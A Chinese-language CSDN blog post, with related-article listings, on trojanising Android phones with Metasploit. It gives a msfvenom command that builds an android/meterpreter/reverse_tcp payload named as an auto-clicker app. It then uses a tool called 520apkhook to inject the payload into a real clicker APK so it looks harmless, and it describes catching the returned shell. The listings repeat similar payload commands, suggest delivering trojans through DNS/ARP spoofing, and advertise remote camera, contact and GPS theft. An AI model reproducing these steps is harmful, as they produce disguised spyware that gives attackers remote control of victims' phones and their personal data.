msf入侵安卓实战

最新推荐文章于 2024-05-01 03:08:32 发布

国雪

最新推荐文章于 2024-05-01 03:08:32 发布

阅读量2.6k

点赞数

分类专栏：渗透测试文章标签： android

本文链接：https://blog.csdn.net/m0_65109001/article/details/128545625

版权

渗透测试专栏收录该内容

1 篇文章 0 订阅

订阅专栏

本文介绍了如何生成一个安卓木马程序，使用msfvenom工具创建reverse_tcp木马，然后利用520apkhook工具将其植入到一个连点器的apk安装包中。最后，说明了如何开启监听并获取shell进行操作。

摘要由CSDN通过智能技术生成

1.生成一个安卓木马端程序

这里是一个裸马，会被检测

msfvenom -p android/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=xxxx -f apk > 自动点击器.apk

这跟直接告诉别人这是木马没有区别了

2.植入程序

这里我用的是一个名叫520apkhook的工具，可以去GitHub上找到

先随便找一个apk的安装包

这里我用的是一个连点器的安装包

生成木马

python3 main.py --lhost xxx.xxx.xxx.xxx --lport xxxx -n ../自动点击器.apk

到这里就算完成了。

3.开启监听

弹回shell

一些基本命令都可以使用

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

国雪

关注关注

0
点赞
踩
41

收藏

觉得还不错? 一键收藏
1
评论
msf入侵安卓实战

msf安卓渗透
复制链接

扫一扫

专栏目录

Kali利用Android木马渗透手机（高级篇）

ykx9994的博客

06-24

405

msfvenom -p android/meterpreter/reverse_tcp LHOST=kali本机ip LPORT=监听端口 R > /放置的目录/文件名.apk。可以看到木马是没有报毒的，至少在MIUI11下是没有提示有病毒，并且申请了很多的权限。内网渗透，非公网IP上线。上面这张图是目标上线后的样子，当目标上线后我们就可以停止DNS劫持了。

MSF入侵安卓手机

2301_77162959的博客

07-11

1327

里边安装了许许多多的工具。其中MSF就自带有。MSF是Metasploit的简称，Metasploit是一款开源的安全漏洞检测工具，非常强大，分别有Windows版和Linux版，工具里集成了许多微软公布的漏洞(0day)。现在要做的就是把木马文件搞到人家的手机上，思路有很多可以DNS arp劫持欺骗只要对方用手机下载文件就会下载我们的木马文件。这样我们就在/root/路径下生成了一个APK的安卓木马文件，至于木马的免杀暂且不谈。还有社工什么等等的，这里我就简单的把木马文件弄我自己的手机上做测试。

1 条评论您还未登录，请先登录后发表或查看评论

利用MSF攻击Android

qq_45746768的博客

07-08

3845

利用Metasploit攻击Android

Msf 入侵安卓手机

weixin_30378311的博客

09-21

991

MSF是Metasploit的简称，Metasploit是一款开源的安全漏洞检测工具，非常强大，分别有Windows版和Linux版，工具里集成了许多微软公布的漏洞(0day)。 1.查看ip ifconfig 2.生成木马 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ribe...

Kali Linux使用MSF木马入侵安卓手机

philip_z的博客

02-13

8322

Kali Linux使用MSF木马入侵安卓手机

使用msf工具对安卓手机进行渗透攻击———超详细

weixin_71669458的博客

07-28

1万+

1.需要安装好kali的虚拟机2.在Windows电脑上需要配置Java环境变量。

Kali利用MSF渗透安卓手机_kali入侵安卓手机，网易严选网络安全开发三面面经

m0_60607397的博客

04-05

1668

Python编程学习，学习内容包含：语法、正则、文件、网络、多线程等常用库，推荐《Python核心编程》，不要看完；在实际的渗透测试过程中，面对复杂多变的网络环境，当常用工具不能满足实际需求的时候，往往需要对现有工具进行扩展，或者编写符合我们要求的工具、自动化脚本，这个时候就需要具备一定的编程能力。恭喜你，如果学到这里，你基本可以从事一份网络安全相关的工作，比如渗透测试、Web 渗透、安全服务、安全分析等岗位；③漏洞扫描、漏洞利用、原理，利用方法、工具（MSF）、绕过IDS和反病毒侦察。

Kali利用MSF渗透安卓手机_kali入侵安卓手机，从外包公司到今日头条offer

2401_84166672的博客

04-09

851

在结束之际，我想重申的是，学习并非如攀登险峻高峰，而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后，持之以恒的学习变得愈发不易，如同在茫茫大海中独自划舟，稍有松懈便可能被巨浪吞噬。然而，对于我们程序员而言，学习是生存之本，是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习，我们便如同逆水行舟，不进则退，终将被时代的洪流所淘汰。因此，不断汲取新知识，不仅是对自己的提升，更是对自己的一份珍贵投资。让我们不断磨砺自己，与时代共同进步，书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。

渗透测试 ( 3 ) --- Metasploit Framework ( MSF )

墨鱼菜鸡

07-11

4438

白嫖 Metasploit Pro 2022：https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022：http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro：https://www.52pojie.cn/thr...

靶机实战-Android4

滕财然的博客

03-28

705

Android4靶机实战文章目录Android4靶机实战1、主机发现2、端口及端口详细信息3、访问http服务(8080端口)4、成功入侵 1、主机发现靶机IP为192.168.110.129 2、端口及端口详细信息开放5555、8080、22000端口 3、访问http服务(8080端口) 提示说有一个后门，并用POST方式提交果断尝试url拼接 backdoor.php: 上面...

vulnhub靶机Android4渗透笔记

liver100day的博客

05-14

808

渗透测试实战-Android4 靶机下载/安装靶机下载：https://www.vulnhub.com/entry/android4-1,233/ Android4靶机IP：未知攻击者IP：192.168.75.128 1主机发现

Kali利用MSF渗透安卓手机_kali入侵安卓手机(1)

热门推荐

m0_74914256的博客

05-05

2万+

Kali Linux利用MSF入侵安卓手机新手下白版最详细，查看对方手机系统信息，查看对方手机安装哪些app文件，远程控制对方手机拍摄一张照片，远程控制对方手机开起视频聊天，实时查看对方手机的信息，获取对方手机的通讯录，实时获取对方手机GPS定位

linux入侵安卓,msf入侵android

weixin_39679061的博客

05-13

1025

金风玉露一相逢，便胜却，人间无数。两情若是久长时，尤其在，朝朝暮暮。我，恋爱了….实验环境攻击机：kali linux ：192.168.0.103受害机：安卓：192.168.0.104用到的工具：- Metasploit- msfvenom- keytools- jarsigner- zipalign- Ettercap实验开始首先使用msfvenom生成一个apk木马1root@kali:~...

msf对小米11进行安全渗透

SwBack的博客

08-24

5233

MSF渗透测试之小米11

msf生成木马攻击android手机

afei001

03-21

6658

实验环境攻击机：kali IP：192.168.43.5 靶机：oppor9st 生成木马攻击android手机 1.在kali上生成反弹木马 root@afei:~# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.5 lport=6666 R > hello.apk [...

msf上线Windows实战

08-21

在f上线Windows实战中，可以使用msfvenom工具一个exe木马文件。生成木马的命令是"msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=监听端口 -f exe > 文件名.exe"。其中，LHOST是攻击机的IP地址，LPORT是监听的端口号。生成的exe文件可以通过各种方式传递给目标Windows系统进行实战操作。123 #### 引用[.reference_title] - *1* [msf windows版](https://download.csdn.net/download/baidu_35488871/12879062)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [Windows网络服务渗透测试实战-MSF恶意程序利用](https://blog.csdn.net/c_lanxiaofang/article/details/124879375)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [MSF上线](https://blog.csdn.net/weixin_51151498/article/details/129542091)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]